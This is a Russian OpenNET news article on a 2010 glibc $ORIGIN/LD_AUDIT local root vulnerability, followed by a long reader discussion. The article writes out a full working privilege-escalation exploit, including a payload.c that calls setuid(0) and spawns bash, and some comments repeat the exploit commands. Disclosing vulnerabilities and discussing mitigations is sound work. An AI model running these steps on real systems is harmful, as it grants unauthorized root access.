The OpenNET Project / Index page

[ новости/++ | форум | wiki | теги ]

19.10.2010 14:47  В Glibc обнаружена серьезная уязвимость

В системной библиотеке GNU C Library (glibc), являющейся основой большинства Linux-дистрибутивов, обнаружена критическая уязвимость, позволяющая любому локальному пользователю получить привилегии суперпользователя. Проблема вызвана игнорированием в Glibc требования спецификации ELF по запрещению использования текущего пути к исполняемому файлу ($ORIGIN) в процессе динамического связывания программ с идентификатором смены владельца или группы (suid/sgid). Проблема проявляется в конфигурациях, в которых пользователь имеет возможность создавать жесткие ссылки в файловой системе, допускающей наличие suid-файлов.

Уязвимость протестирована в Fedora 13 и RHEL 5 / CentOS 5, другие дистрибутивы судя по всему также подвержены проблеме. Исправления пока недоступны, статус выхода обновлений в различных Linux-дистрибутивах можно наблюдать на следующих страницах: Slackware, Gentoo, Mandriva, openSUSE, CentOS, Fedora, RHEL, Debian, Ubuntu.

Проблема была известна и ранее, но разработчики Glibc считали, что эксплуатировать ее невозможно. Используя режим аудита связывания программ (LD_AUDIT) в ld.so, вкупе с подменой $ORIGIN через создание жесткой ссылки и запуском suid-программы через файловый дескриптор, удалось разработать практический метод атаки. Проверить свою систему на наличие уязвимости можно следующим способом:



Создаем произвольную директорию:

   $ mkdir /tmp/exploit

Привязываем suid-программу жесткой ссылкой в созданную директорию (при выполнении будет изменен $ORIGIN):

   $ ln /bin/ping /tmp/exploit/target

Открываем для исполняемого файла файловый дескриптор:

   $ exec 3< /tmp/exploit/target

Данный файловый дескриптор должен быть виден в пространстве /proc

   $ ls -l /proc/$$/fd/3
   lr-x------ 1 taviso taviso 64 Oct 15 09:21 /proc/10836/fd/3 -> /tmp/exploit/target*

Удаляем ранее созданную директорию

   $ rm -rf /tmp/exploit/

В /proc дескриптор остался, но теперь помечен как удаленный:

   $ ls -l /proc/$$/fd/3
   lr-x------ 1 taviso taviso 64 Oct 15 09:21 /proc/10836/fd/3 -> /tmp/exploit/target (deleted)

Заменяем директорию на специально созданный эксплоит (имя директории будет открыто через dlopen):

   $ cat > payload.c
   void __attribute__((constructor)) init()
   {
       setuid(0);
       system("/bin/bash");
   }
   ^D

   $ gcc -w -fPIC -shared -o /tmp/exploit payload.c
   $ ls -l /tmp/exploit
   -rwxrwx--- 1 taviso taviso 4.2K Oct 15 09:22 /tmp/exploit*

Инициируем динамическое связывание и загрузку $ORIGIN через LD_AUDIT и запуск программы по файловому дескриптору в /proc
   
   $ LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3
   sh-4.1# whoami
   root
   sh-4.1# id
   uid=0(root) gid=500(taviso)

В качестве временной меры защиты рекомендуются перемонтировать все доступные сторонним пользователям на запись директории в режиме nosuid (актуально только если suid-файл и доступная на запись директория присутствуют в одном дисковом разделе, например, /tmp или /home являются частью корневого раздела, так как жесткая ссылка не может быть установлена из одного дискового раздела в другой) :


   # mount -o bind /tmp /tmp
   # mount -o remount,bind,nosuid /tmp /tmp

Дополнение: Разработчики из компании Red Hat выпустили патч, устраняющий проблему в Glibc.

  1. Главная ссылка к новости (http://seclists.org/fulldisclo...)
  2. OpenNews: Ошибка в библиотеке libc привела к уязвимости большинства FTP-серверов
Лицензия: CC-BY
Тип: Проблемы безопасности
Ключевые слова: glibc, security
При перепечатке указание ссылки на opennet.ru обязательно
Обсуждение Линейный вид | Ajax | Показать все | RSS
 
  • 1.1, KERNEL_PANIC, 15:03, 19/10/2010 [ответить] [смотреть все]
  • –4 +/
    Оу, как страшно.
     
     
  • 2.7, follow_me, 15:37, 19/10/2010 [^] [ответить] [смотреть все] [показать ветку]
  • –1 +/
    Покажи свой IP и ты узнаешь как страшно , вернее ты и не заметишь как всё закон... весь текст скрыт [показать] [показать ветку]
     
     
  • 3.10, arcade, 15:40, 19/10/2010 [^] [ответить] [смотреть все]  
  • +/
    Я не замечу У меня фря и зфс, и такие глупости как один раздел под все файлы я ... весь текст скрыт [показать]
     
     
  • 4.13, User294, 15:48, 19/10/2010 [^] [ответить] [смотреть все]  
  • +16 +/
    > давно такая бага в ядре и никто не зопатчил...

    Epic, epic, epic fail!

    Hint #1: может быть, вам следует для начала научиться отличать ядро от glibc, а уже потом умничать начинать? :)
    Hint #2: в природе, кстати,  есть более чем одна реализация libc. И ряд линухов пользуется ими. Потому что ядро и либцэ - "немного" разные вещи.

     
  • 4.14, paxuser, 15:54, 19/10/2010 [^] [ответить] [смотреть все]  
  • –10 +/
    Бага, к сожалению, не в ядре, а в glibc Что до FreeBSD, то по наличию мер предо... весь текст скрыт [показать]
     
     
  • 5.22, butcher, 16:15, 19/10/2010 [^] [ответить] [смотреть все]  
  • +3 +/
    Обоснуете Или так, ваше личное мнение ... весь текст скрыт [показать]
     
     
  • 6.33, paxuser, 16:40, 19/10/2010 [^] [ответить] [смотреть все]  
  • +6 +/
    >> Бага, к сожалению, не в ядре, а в glibc. Что до FreeBSD,
    >> то по наличию мер предотвращения эксплуатации уязвимостей она до сих пор
    >> находится на уровне года, эдак, 2001-го и отстаёт от NetBSD и
    >> тем более от OpenBSD.
    > Обоснуете? Или так, ваше личное мнение?

    Конечно обосную. Во FreeBSD не ни аналогов W^X, ни ASLR, ни PIE, даже возмоность сборки с SSP добавили лишь недавно. В том же CentOS всё это в той или иной мере есть (для юзерспейса). В ванильном линуксе уже реализован аналог W^X, ASLR, поддержка PIE и защита от маппинга памяти по нулевому адресу (с 2008 г.). Не говоря уже о PaX и Grsecurity, где на данный момент реализованы защиты ядра от классов уязвимостей для нескольких аппаратных архитектур, включая аналог W^X для юзерспецса (KERNEXEC), защиту от обращения по указателям на юзерспейс (UDEREF), проверки границ данных при копировании из юзерспейса в ядро (USERCOPY) и т.д.. С полным списком можете ознакомиться сами на grsecurity.net и pax.grsecurity.net + помощь в конфигураторе ядра с PaX и Grsecurity. Датировка первых реализаций PaX - 2001-2002 г. (точнее не вспомню), Grsecurity - 2003-ий год, начала аудита кода ядра и юзерспейса в OpenBSD - 96-ой год, начала включения ProPolice (SSP) - если не ошибаюсь, то 2001-ый год. В 2004-ом году (в сети есть слайды с презентации) в OpenBSD уже были W^X, аналог SSP, StackGhost (продвинутый аналог SSP для Sparc) и ASLR, в 2007-2008 г. была реализована поддержка PIE, в 2009-ом - запрет на памминг нулевого адреса. За NetBSD я не слежу, но пару-тройку лет назад они начали портировать что-то из PaX - гугль в помощь.

     
     
  • 7.100, BigHo, 23:07, 19/10/2010 [^] [ответить] [смотреть все]  
  • +4 +/
    W X - технология, основанная на Х-бит Если так, то она есть - ею можно пользов... весь текст скрыт [показать]
     
     
  • 8.104, PereresusNeVlezaetBuggy, 00:06, 20/10/2010 [^] [ответить] [смотреть все]  
  • +2 +/
    Не обязательно именно на аппаратный бит Суть именно в принципе 171 либо запис... весь текст скрыт [показать]
     
     
  • 9.111, BigHo, 01:03, 20/10/2010 [^] [ответить] [смотреть все]  
  • +/
    В смысле тот, который nX AMD Xd INTEL Как его не назови, а суть одна Без его... весь текст скрыт [показать]
     
     
  • 10.112, PereresusNeVlezaetBuggy, 01:42, 20/10/2010 [^] [ответить] [смотреть все]  
  • +/
    gt оверквотинг удален Тут и возникает дилемма позволять использовать потенциа... весь текст скрыт [показать]
     
     
  • 11.118, paxuser, 02:19, 20/10/2010 [^] [ответить] [смотреть все]  
  • –2 +/
    Вот только в PaX почему-то такой дилеммы не вознает Этот рейс кондишен связа... весь текст скрыт [показать]
     
  • 11.120, BigHo, 03:19, 20/10/2010 [^] [ответить] [смотреть все]  
  • +/
    Не в курсе был про такое поведение OpenBSD Видимо серьезный тон задает фон кате... весь текст скрыт [показать]
     
  • 10.114, paxuser, 02:06, 20/10/2010 [^] [ответить] [смотреть все]  
  • +/
    Существует как минимум две альтернативных, архитектурно-зависимых реализаций W X... весь текст скрыт [показать]
     
  • 9.159, User294, 17:21, 20/10/2010 [^] [ответить] [смотреть все]  
  • +/
    Аппаратная защита надежнее программной Одно дело если проц на уровне железа exc... весь текст скрыт [показать]
     
     
  • 10.161, PereresusNeVlezaetBuggy, 17:38, 20/10/2010 [^] [ответить] [смотреть все]  
  • +/
    Вы бы хоть с предметом ознакомились сначала Ну хотя бы в Википедию заглянули, е... весь текст скрыт [показать]
     
     
  • 11.166, User294, 20:04, 20/10/2010 [^] [ответить] [смотреть все]  
  • +/
    И правда, про возможность поюзать CS чтобы сделать изоляцию я все-таки пробаклан... весь текст скрыт [показать]
     
     
  • 12.169, PereresusNeVlezaetBuggy, 21:08, 20/10/2010 [^] [ответить] [смотреть все]  
  • +/
    В защищённом режиме 8212 да, CS и SS нельзя произвольно менять Думаю, в расс... весь текст скрыт [показать]
     
     
  • 13.170, paxuser, 21:22, 20/10/2010 [^] [ответить] [смотреть все]  
  • +/
    Там в одних тестах на синтетике оверхед был до 36 В других хоть и тестировалис... весь текст скрыт [показать]
     
  • 10.163, paxuser, 17:41, 20/10/2010 [^] [ответить] [смотреть все]  
  • +/
    Зависит от того, что имеется ввиду под программной и под аппаратной защитой Сов... весь текст скрыт [показать]
     
     
  • 11.165, User294, 19:46, 20/10/2010 [^] [ответить] [смотреть все]  
  • +/
    Все бы ничего, но в таковых средах, типа Java NET PHP whatever почему-то на... весь текст скрыт [показать]
     
     
  • 12.168, paxuser, 20:44, 20/10/2010 [^] [ответить] [смотреть все]  
  • +/
    Java NET PHP - это разве маргинальные языки платформы Это угодные индустрии ко... весь текст скрыт [показать]
     
  • 8.106, paxuser, 00:17, 20/10/2010 [^] [ответить] [смотреть все]  
  • +1 +/
    Возможно, в последних версиях FreeBSD действительно появился аналог W X, но я об... весь текст скрыт [показать]
     
     
  • 9.119, BigHo, 02:35, 20/10/2010 [^] [ответить] [смотреть все]  
  • +/
    Про то и речь Только с уточнением результата - для AMD64 нормально работает В ... весь текст скрыт [показать]
     
     
  • 10.121, paxuser, 03:58, 20/10/2010 [^] [ответить] [смотреть все]  
  • +2 +/
    gt оверквотинг удален Да нет там никаких принципиальных различий, разница по с... весь текст скрыт [показать]
     
     
  • 11.122, paxuser, 04:00, 20/10/2010 [^] [ответить] [смотреть все]  
  • +/
    s Реализация UDEREF вкратце описана Реализация UDEREF для amd64 вкратце описана ... весь текст скрыт [показать]
     
  • 11.123, paxuser, 04:19, 20/10/2010 [^] [ответить] [смотреть все]  
  • +/
    Более внятное описание USERCOPY из хелпа к конфигу By saying Y here the kernel ... весь текст скрыт [показать]
     
  • 11.196, taaroa, 13:14, 24/10/2010 [^] [ответить] [смотреть все]  
  • +/
    Позвольте Вас дополнить и поправить Slo-Tech Could you please describe in few ... весь текст скрыт [показать]
     
     
  • 12.197, paxuser, 22:19, 24/10/2010 [^] [ответить] [смотреть все]  
  • +/
    Не совсем так Из интервью с самим pipacs I talked to a few friends about it a... весь текст скрыт [показать]
     
  • 8.107, paxuser, 00:22, 20/10/2010 [^] [ответить] [смотреть все]  
  • +/
    Сейчас - Hardened Gentoo и CentOS, очень редко другие дистрибутивы Раньше - Fre... весь текст скрыт [показать]
     
     
  • 9.167, User294, 20:30, 20/10/2010 [^] [ответить] [смотреть все]  
  • –1 +/
    Ух ты, кажется я впервые в жизни вижу вменяемого пользователя Генту, способного ... весь текст скрыт [показать]
     
  • 5.23, mma, 16:16, 19/10/2010 [^] [ответить] [смотреть все]  
  • –3 +/
    Что-то вы тут фантазируете ни по одному из пунктов не согласен 1 Да фряха знач... весь текст скрыт [показать]
     
     
  • 6.37, paxuser, 16:46, 19/10/2010 [^] [ответить] [смотреть все]  
  • +1 +/
    Она не только локальным подвержена - пользовательские процессы наиболее подверже... весь текст скрыт [показать]
     
     
  • 7.39, тигар, 16:54, 19/10/2010 [^] [ответить] [смотреть все]  
  • +1 +/
    всеже хотелось бы увидеть пример при помощи которого я удаленно подниму свои при... весь текст скрыт [показать]
     
     
  • 8.41, paxuser, 16:59, 19/10/2010 [^] [ответить] [смотреть все]  
  • +1 +/
    Нет, не об этом речь Но если взломщик заполучил права обычного пользователя и з... весь текст скрыт [показать]
     
     
  • 9.43, тигар, 17:02, 19/10/2010 [^] [ответить] [смотреть все]  
  • +1 +/
    дак а fbsd причем или в линаксах еще где-то между вышеописанными шагами чтение... весь текст скрыт [показать]
     
     
  • 10.45, paxuser, 17:12, 19/10/2010 [^] [ответить] [смотреть все]  
  • +/
    В линуксе реализованы механизмы, затрудняющие и или предотвращающие экслпуатацию... весь текст скрыт [показать]
     
     
  • 11.46, paxuser, 17:18, 19/10/2010 [^] [ответить] [смотреть все]  
  • +1 +/
    Для ясности безопасность ванильного линукса лично я оцениваю очень низко там п... весь текст скрыт [показать]
     
  • 11.48, тигар, 17:20, 19/10/2010 [^] [ответить] [смотреть все]  
  • +/
    я пытаюсь понять зачем Вы пишете наборы фраз то PaX и Grsecurity то Она не то... весь текст скрыт [показать]
     
     
  • 12.53, paxuser, 17:26, 19/10/2010 [^] [ответить] [смотреть все]  
  • +/
    Нет, вы просто хамите и либо не желаете понять, либо не обладаете даже базовым п... весь текст скрыт [показать]
     
     
  • 13.58, тигар, 17:45, 19/10/2010 [^] [ответить] [смотреть все]  
  • +1 +/
    знаете меня больше практика интересует Есть примеры Где посмотреть статисти... весь текст скрыт [показать]
     
     
  • 14.73, paxuser, 19:07, 19/10/2010 [^] [ответить] [смотреть все]  
  • +/
    Вас не практика интересует, а некие примеры и статистика, которые в реальном мир... весь текст скрыт [показать]
     
     
  • 15.87, Добрый Аноним, 21:25, 19/10/2010 [^] [ответить] [смотреть все]  
  • –1 +/
    Все так и имеет место быть, и тем ни менее, в линухах рута получают чаще, чем во... весь текст скрыт [показать]
     
     
  • 16.95, paxuser, 22:30, 19/10/2010 [^] [ответить] [смотреть все]  
  • +/
    Чаще или нет - меня, например, вообще не интересует Меня интересует, есть ли сп... весь текст скрыт [показать]
     
     
  • 17.130, Добрый Аноним, 11:41, 20/10/2010 [^] [ответить] [смотреть все]  
  • +/
    Ну да, когда куча детей сует свой код в ядро, действительно защищаться нужно, пр... весь текст скрыт [показать]
     
  • 16.98, User294, 22:43, 19/10/2010 [^] [ответить] [смотреть все]  
  • +1 +/
    Еще один горе-аналитик Как обычно - с ТУПЫМИ ошибками Позор Интересно, а горе... весь текст скрыт [показать]
     
     
  • 17.102, paxuser, 23:15, 19/10/2010 [^] [ответить] [смотреть все]  
  • +/
    На этот счёт есть разные мнения http archives neohapsis com archives dailydav... весь текст скрыт [показать]
     
  • 17.131, Добрый Аноним, 11:46, 20/10/2010 [^] [ответить] [смотреть все]  
  • +/
    юзер обиделся забавно можно, с этим кто-то спорит В линуксе, сейчас, дыры н... весь текст скрыт [показать]
     
     
  • 18.141, paxuser, 14:28, 20/10/2010 [^] [ответить] [смотреть все]  
  • +/
    Только в отличие от винды, у линукса уже есть стабильная, проверенная временем р... весь текст скрыт [показать]
     
     
  • 19.147, Добрый Аноним, 14:41, 20/10/2010 [^] [ответить] [смотреть все]  
  • +/
    Вы же в курсе, что в винде тоже постоянно изобретают ловушки для своего кода , ... весь текст скрыт [показать]
     
     
  • 20.155, paxuser, 16:44, 20/10/2010 [^] [ответить] [смотреть все]  
  • +/
    Да, и я даже в курсе, у кого они списывают свои ловушки , а также почему у них ... весь текст скрыт [показать]
     
  • 21.160, Добрый Аноним, 17:25, 20/10/2010 [^] [ответить] [смотреть все]  
  • +/
    Хе, а вы мне уже начинаете нравиться ... весь текст скрыт [показать]
     
  • 18.149, User294, 15:41, 20/10/2010 [^] [ответить] [смотреть все]  
  • +/
    Обиделся На кого Я всего лишь не понимаю зачем надо выступать с горе-аналитик... весь текст скрыт [показать]
     
     
  • 19.152, Добрый Аноним, 16:36, 20/10/2010 [^] [ответить] [смотреть все]  
  • +/
    Был бы я не добрый сегодня, я бы поругался конечно , но коли я уж добрый, опущ... весь текст скрыт [показать]
     
  • 19.157, paxuser, 17:15, 20/10/2010 [^] [ответить] [смотреть все]  
  • +/
    Я немного вмешаюсь, простите Спам чаще валится с десктопов, потому что их гораз... весь текст скрыт [показать]
     
     
  • 20.158, paxuser, 17:21, 20/10/2010 [^] [ответить] [смотреть все]  
  • +/
    s/их гораздо меньше/их гораздо больше/

     
  • 21.164, User294, 18:41, 20/10/2010 [^] [ответить] [смотреть все]  
  • +/
    0xFF Зарегались бы вы, а Тогда вы смогли бы исправлять такое путем редакт... весь текст скрыт [показать]
     
  • 16.110, blah, 01:01, 20/10/2010 [^] [ответить] [смотреть все]  
  • +/
    сразу видно высказывание человека, к-ый вообще не шарит в безопасности вам вы... весь текст скрыт [показать]
     
  • 15.92, тигар, 22:12, 19/10/2010 [^] [ответить] [смотреть все]  
  • +/
    погодите, если я понял правильно то Вы предлагаете мне самому доказать Ваши голо... весь текст скрыт [показать]
     
     
  • 16.101, paxuser, 23:08, 19/10/2010 [^] [ответить] [смотреть все]  
  • +/
    Нет, вы поняли неправильно, вернее, вы занимаетесь казуистикой, наигранно делая ... весь текст скрыт [показать]
     
  • 13.62, Аноним, 18:20, 19/10/2010 [^] [ответить] [смотреть все]  
  • +/
    Вы сами то верите в то что понаписали И какие же это пользовательские процес... весь текст скрыт [показать]
     
     
  • 14.75, paxuser, 19:14, 19/10/2010 [^] [ответить] [смотреть все]  
  • +1 +/
    Не верю, а знаю Любые, которые обрабатывают данные из внешних, потенциально опа... весь текст скрыт [показать]
     
  • 14.86, User294, 21:10, 19/10/2010 [^] [ответить] [смотреть все]  
  • +/
    > Руки подтачите

    Yet another *EPIC* FAIL!

     
  • 13.125, kshetragia, 08:10, 20/10/2010 [^] [ответить] [смотреть все]  
  • +/
    Приведите статистику по дырам для Linux и FreeBSD для начала Быть может все эти... весь текст скрыт [показать]
     
     
  • 14.142, paxuser, 14:34, 20/10/2010 [^] [ответить] [смотреть все]  
  • +/
    На статистику по дырам ориентироваться бессмысленно, т к в первую очередь на ... весь текст скрыт [показать]
     
     
  • 15.180, kshetragia, 04:28, 21/10/2010 [^] [ответить] [смотреть все]  
  • +/
    Я про это и говорю Зачем городить огород раньше времени, если по факту дыры л... весь текст скрыт [показать]
     
     
  • 16.181, kshetragia, 04:32, 21/10/2010 [^] [ответить] [смотреть все]  
  • +/
    Я не специалист по безопасности, но kern securelevel 2, mount to read only -... весь текст скрыт [показать]
     
     
  • 17.183, paxuser, 06:39, 21/10/2010 [^] [ответить] [смотреть все]  
  • +/
    Озвучьте предложение на Full-Disclosure или DailyDave, оговорите достойное возна... весь текст скрыт [показать]
     
  • 16.182, paxuser, 06:31, 21/10/2010 [^] [ответить] [смотреть все]  
  • +/
    Вы говорите совершенно об обратном и вдобавок питаете иллюзии о чистоте кода, ко... весь текст скрыт [показать]
     
  • 5.30, User294, 16:37, 19/10/2010 [^] [ответить] [смотреть все]  
  • +/
    А как оценивалось качество кода? По какой методике?
     
  • 5.129, QuAzI, 11:17, 20/10/2010 [^] [ответить] [смотреть все]  
  • +1 +/
    Почему к сожалению Что до FreeBSD, давеча писали про http www opennet ru o... весь текст скрыт [показать]
     
     
  • 6.140, paxuser, 14:24, 20/10/2010 [^] [ответить] [смотреть все]  
  • –1 +/
    Потому что ядро и так дырявое дыркой больше, дыркой меньше Знаете, у меня... весь текст скрыт [показать]
     
     
  • 7.153, QuAzI, 16:38, 20/10/2010 [^] [ответить] [смотреть все]  
  • +/
    Почему на второй машине не проявилась на дырявом же ProFTPd Извините, вы выше ... весь текст скрыт [показать]
     
     
  • 8.156, paxuser, 16:57, 20/10/2010 [^] [ответить] [смотреть все]  
  • +1 +/
    А я откуда знаю Но уж точно не потому, что между креслом и монитором находитесь... весь текст скрыт [показать]
     
     
  • 9.171, QuAzI, 23:00, 20/10/2010 [^] [ответить] [смотреть все]  
  • –2 +/
    Неа, бессовестно хамите тут как раз Вы, но очень уж уверены что именно Вы самый ... весь текст скрыт [показать]
     
     
  • 10.172, PereresusNeVlezaetBuggy, 23:51, 20/10/2010 [^] [ответить] [смотреть все]  
  • +/
    Как ламер позорный, позволю себе всё же заметить, что тов paxuser 8212 дейст... весь текст скрыт [показать]
     
     
  • 11.176, QuAzI, 01:10, 21/10/2010 [^] [ответить] [смотреть все]  
  • +/
    Пардон Человек тут на пол темы расписал, как хорош PaX и патчи для linux на осн... весь текст скрыт [показать]
     
     
  • 12.178, paxuser, 01:31, 21/10/2010 [^] [ответить] [смотреть все]  
  • +/
    Не пардон Вы до сих пор считаете, что я что-то расписывал в категориях хорошо-п... весь текст скрыт [показать]
     
     
  • 13.184, QuAzI, 08:27, 21/10/2010 [^] [ответить] [смотреть все]  
  • +/
    А ничего что Grsecurity основан на PaX Это всё равно что написать PaX вместе с... весь текст скрыт [показать]
     
     
  • 14.186, paxuser, 09:14, 21/10/2010 [^] [ответить] [смотреть все]  
  • +/
    зеваю Очередная несусветная глупость, уже даже почти немного смешная Логики п... весь текст скрыт [показать]
     
  • 10.173, paxuser, 00:17, 21/10/2010 [^] [ответить] [смотреть все]  
  • +/
    Где конкретно я хамил Это ваши фантазии и трусливая попытка прировнять надуманн... весь текст скрыт [показать]
     
     
  • 11.174, QuAzI, 00:45, 21/10/2010 [^] [ответить] [смотреть все]  
  • +/
    А где конкретно я хамил, конкретно Вам до вашего треда о том что я хам У меня т... весь текст скрыт [показать]
     
     
  • 12.175, paxuser, 01:06, 21/10/2010 [^] [ответить] [смотреть все]  
  • +/
    вы выше _орали_ про аппаратную реализацию, а аналоги использовать уже другой ... весь текст скрыт [показать]
     
     
  • 13.177, QuAzI, 01:27, 21/10/2010 [^] [ответить] [смотреть все]  
  • +/
    _орали_ - а как ещё назвать тучу постов выше _давайте, расхвалите мне её тут_- ... весь текст скрыт [показать]
     
     
  • 14.179, paxuser, 01:51, 21/10/2010 [^] [ответить] [смотреть все]  
  • +/
    Высказывал мнение, аргументы, контраргументы, давал пояснения, повторял для особ... весь текст скрыт [показать]
     
     
  • 15.185, QuAzI, 08:30, 21/10/2010 [^] [ответить] [смотреть все]  
  • +/
    > Знаете, у меня тоже есть дела поважнее

    Не похоже, ой не похоже.

     
     
  • 16.187, paxuser, 09:14, 21/10/2010 [^] [ответить] [смотреть все]  
  • +/
    Ну вам виднее, конечно ... весь текст скрыт [показать]
     
     
  • 17.188, QuAzI, 16:21, 21/10/2010 [^] [ответить] [смотреть все]  
  • +/
    Можно немножко откровения? Почему у Вас PaX даже в никнейме?
     
     
  • 18.189, paxuser, 17:58, 21/10/2010 [^] [ответить] [смотреть все]  
  • +/
    Это скорее подпись, которая звучит проще, чем grsecuser или grsecurityuser, а су... весь текст скрыт [показать]
     
  • 3.19, Аноним, 16:08, 19/10/2010 [^] [ответить] [смотреть все]  
  • +/
    вот так ... весь текст скрыт [показать]
     
  • 3.51, ы, 17:25, 19/10/2010 [^] [ответить] [смотреть все]  
  • –1 +/
    Сетка класса А 127 0 0 0 8, выбери любой из 16 777 214 айпишников ... весь текст скрыт [показать]
     
  • 3.81, Аноним2, 19:41, 19/10/2010 [^] [ответить] [смотреть все]  
  • +/
    Твои пинги я действительно заметить не успею.
     
  • 1.5, V, 15:33, 19/10/2010 [ответить] [смотреть все]  
  • +3 +/
    $ LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3
    Inconsistency detected by ld.so: dl-open.c: 266: dl_open_worker: Assertion '(call_map)->l_name[0] == '\0'' failed!
    Connection to board-gw closed.

    не судьба..

     
     
  • 2.25, h4tr3d, 16:24, 19/10/2010 [^] [ответить] [смотреть все] [показать ветку]  
  • +/
    Аналогично, это в консольке, xterm просто закрылся может shell тоже имеет значе... весь текст скрыт [показать] [показать ветку]
     
     
  • 3.32, Rain, 16:40, 19/10/2010 [^] [ответить] [смотреть все]  
  • +/
    Нет, перенаправь вывод ошибок в файл и увидишь то же самое
     
     
  • 4.151, User294, 15:49, 20/10/2010 [^] [ответить] [смотреть все]  
  • +/
    Можно просто шелл в шелле запустить Когда чайлдовый шелл помрет, вы вывалитесь ... весь текст скрыт [показать]
     
  • 1.6, Аноним, 15:36, 19/10/2010 [ответить] [смотреть все]  
  • +2 +/
    на шаге LD_AUDIT ORIGIN exec proc self fd 3 шелл упал дистр OpenSUSE 11 ... весь текст скрыт [показать]
     
     
  • 2.83, killer1804, 20:12, 19/10/2010 [^] [ответить] [смотреть все] [показать ветку]  
  • +/
    user0 homelinux uname -a Linux homelinux 2 6 35-ARCH шел упал аналоги... весь текст скрыт [показать] [показать ветку]
     
  • 1.8, Egres, 15:38, 19/10/2010 [ответить] [смотреть все]  
  • +/
    $ mkdir /tmp/exploit
    $ ln /bin/ping /tmp/exploit/target
    ln: создание жесткой ссылки '/tmp/exploit/target' => '/bin/ping': Операция не позволяется

    Ubuntu 10.10, /tmp не является отдельной fs

     
     
  • 2.49, tallman, 17:24, 19/10/2010 [^] [ответить] [смотреть все] [показать ветку]  
  • +/
    и в логе такая штука tail -1 var log messages Oct 19 16 17 21 machine kernel ... весь текст скрыт [показать] [показать ветку]
     
  • 1.9, paxuser, 15:40, 19/10/2010 [ответить] [смотреть все]  
  • +/
    Кстати, в Grsecurity по умолчанию включены запреты пользователям на создание хардлинков на чужие файлы.
     
  • 1.11, Аноним, 15:40, 19/10/2010 [ответить] [смотреть все]  
  • +/
    Исправления нет - как так?!
     
     
  • 2.28, Andrey Mitrofanov, 16:36, 19/10/2010 [^] [ответить] [смотреть все] [показать ветку]  
  • +/
    Заголовок, "обнаружена". Вопросы?
     
  • 1.12, bircoph, 15:46, 19/10/2010 [ответить] [смотреть все]  
  • +/
    В Gentoo у меня FEATURES="sfperms", что ставит права go-r на все suid файлы.
    Так что эксплойт не работает и я в безопасности )).
     
     
  • 2.15, paxuser, 15:57, 19/10/2010 [^] [ответить] [смотреть все] [показать ветку]  
  • –2 +/
    У вас в Gentoo месяцами обновления безопасности не выпускаются - посмотрите хотя... весь текст скрыт [показать] [показать ветку]
     
     
  • 3.20, Аноним, 16:11, 19/10/2010 [^] [ответить] [смотреть все]  
  • +2 +/
    emerge --sync по чаще делай
     
     
  • 4.24, paxuser, 16:20, 19/10/2010 [^] [ответить] [смотреть все]  
  • +/
    Между прочим, emerge --sync подвержен MitM-атакам Давно перешёл на emerge-webrs... весь текст скрыт [показать]
     
     
  • 5.136, anonymous, 13:40, 20/10/2010 [^] [ответить] [смотреть все]  
  • –1 +/
    Паранойя головного мозга во все поля.
     
     
  • 6.143, paxuser, 14:36, 20/10/2010 [^] [ответить] [смотреть все]  
  • +/
    Блажен, кто верует, знание же преумножает скорбь ... весь текст скрыт [показать]
     
  • 3.34, bircoph, 16:43, 19/10/2010 [^] [ответить] [смотреть все]  
  • +/
    Я mysql не пользуюсь, так что меня это не волнует GLSA по критическим уязвимост... весь текст скрыт [показать]
     
     
  • 4.38, paxuser, 16:49, 19/10/2010 [^] [ответить] [смотреть все]  
  • +/
    О скорости выхода GLSA - это вы на gentoo-security расскажите, чтобы разработчи... весь текст скрыт [показать]
     
  • 4.77, maxkit, 19:18, 19/10/2010 [^] [ответить] [смотреть все]  
  • +/
    > Я mysql не пользуюсь

    Ну и аргументы.

     
  • 1.16, Толстый, 16:02, 19/10/2010 [ответить] [смотреть все]  
  • +3 +/
    на CentOS 5 сработало!
     
  • 1.18, Аноним, 16:03, 19/10/2010 [ответить] [смотреть все]  
  • +/
    на третьем шаге уже не дает exec 3 tmp exploit target bash tmp exploit t... весь текст скрыт [показать]
     
     
  • 2.21, Вова, 16:12, 19/10/2010 [^] [ответить] [смотреть все] [показать ветку]  
  • +1 +/
    1, на двух гентах пытался, дома и на работе... весь текст скрыт [показать] [показать ветку]
     
     
  • 3.82, ozs, 20:02, 19/10/2010 [^] [ответить] [смотреть все]  
  • +1 +/
    mkdir tmp exploit ln bin ping tmp exploit target ... весь текст скрыт [показать]
     
     
  • 4.96, Ytch, 22:37, 19/10/2010 [^] [ответить] [смотреть все]  
  • +/
    По умолчанию на Zenwalk 6 4 аналогично Если на bin ping рутом дать права на чт... весь текст скрыт [показать]
     
  • 1.26, svchost, 16:29, 19/10/2010 [ответить] [смотреть все]  
  • –2 +/
    Насквозь дырявое ядро, если при уязвимости в какой-нибудь библиотеке можно заполучить root. Такое впечатление, что в оффтопике ядро вылизано настолько, что там нет никаких уязвимостей. По крайней мере я не знаю способов заполучить привилегии админа в давно вышедшей XP SP3 не говоря уже о семерке.
    Сильно не пинайте, но иногда такие мысли возникают.
     
     
  • 2.31, Аноним, 16:38, 19/10/2010 [^] [ответить] [смотреть все] [показать ветку]  
  • +/
    Сильно не пинайте, но иногда такие мысли возникают В ХР необходимости не было п... весь текст скрыт [показать] [показать ветку]
     
  • 2.35, name, 16:44, 19/10/2010 [^] [ответить] [смотреть все] [показать ветку]  
  • +1 +/
    вирусы типа kido отлично знают, в отличие от вас.
     
  • 2.59, User294, 17:55, 19/10/2010 [^] [ответить] [смотреть все] [показать ветку]  
  • +1 +/
    Господи, что вы там курите если не понимаете разницы между ядром и либой привиле... весь текст скрыт [показать] [показать ветку]
     
  • 2.68, Зилибоба, 18:41, 19/10/2010 [^] [ответить] [смотреть все] [показать ветку]  
  • +/
    чтоб глупости в голову не лезли, нужно больше читать умных статей, например, htt... весь текст скрыт [показать] [показать ветку]
     
     
  • 3.79, Пользователь Debian, 19:34, 19/10/2010 [^] [ответить] [смотреть все]  
  • +/
    Server Error in technet Application Кажется, Вы запостили в этом URL е экс... весь текст скрыт [показать]
     
     
  • 4.108, Аноним, 00:30, 20/10/2010 [^] [ответить] [смотреть все]  
  • +/
    точку в конце адреса убери
     
  • 4.109, Митра, 00:31, 20/10/2010 [^] [ответить] [смотреть все]  
  • +/
    там точка в конце лишняя.
     
  • 3.93, User294, 22:26, 19/10/2010 [^] [ответить] [смотреть все]  
  • +1 +/
    А это вообще лулзов пачка Более того - была еще фича предложить юзеру скача... весь текст скрыт [показать]
     
     
  • 4.133, Добрый Аноним, 11:53, 20/10/2010 [^] [ответить] [смотреть все]  
  • +/
